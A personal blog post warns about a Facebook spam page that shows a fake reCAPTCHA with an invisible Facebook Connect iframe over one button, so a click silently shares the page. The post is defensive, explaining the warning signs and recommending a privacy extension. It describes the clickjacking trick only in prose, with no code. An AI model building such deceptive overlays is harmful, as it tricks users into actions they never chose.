Random Notes

Facebook Auto-Sharing Spam Pages

Whatever you think of Internet scammers, they sure are inventive. They keep figuring out new ways to scam people for clicks, money, or whatever it is they want. Today I noticed a new type of auto-sharing spam page that was unwittingly shared by a Facebook friend of mine. It takes form as a regular looking clickbait page that lures you in with its title, but when you go to the page, it fools the user into sharing it on their own page.

A fake reCAPTCHA that may look convincing at a quick glance.

The picture above shows that the page looks like your typical “funny/incredible links” website that opens a reCAPTCHA window to ensure you are a human and not a robot. A reasonable request, right? It should be immediately suspicious, though, that this CAPTCHA is opened as soon as the site opens and is not related to user input. You can also notice that the dialog looks slightly too unprofessional to be real, especially having no spaces in the list of numbers and no period after the sentence.

What happens is that the user is lured to click through the fake reCAPTCHA, letting them through to the content. The first two as well as the last two numbers do nothing when clicked, except show a nice green checkmark as thanks for the user’s unfailing co-operation. The third number, however, contains an <iframe> that renders an invisible Facebook Connect form. This form, when clicked, will automatically share the page on the user’s timeline, all without showing the user a confirmation prompt or any other indication that they have now “liked” the page.

The invisible Facebook Connect form that is positioned on top of the third number of the reCAPTCHA.
The end result on a victim's timeline.
If you are using incognito mode or are not logged in to Facebook, clicking the third number will open the Facebook login page in a popup.

The page and the fake reCAPTCHA can be quite convincing to a regular user and they may be completely unaware that they have shared the page. This is made worse by the fact that Facebook apparently does not ask for any confirmation when sharing pages from external sources. This could be easily avoided by opening a popup asking if the user really wishes to share the page on their timeline, or by having the user confirm the share inside Facebook itself. But I guess that is not in Facebook’s best interests, since it actually creates more active timelines, even if the content itself is useless.

To avoid this happening to you, I suggest using a privacy extension like Ghostery, that will prevent the Facebook Connect form from being loaded onto a page unless you specifically allow it. In addition to making web browsing safer, it will also make it faster, as you no longer load unnecessary tracking codes on every site you visit.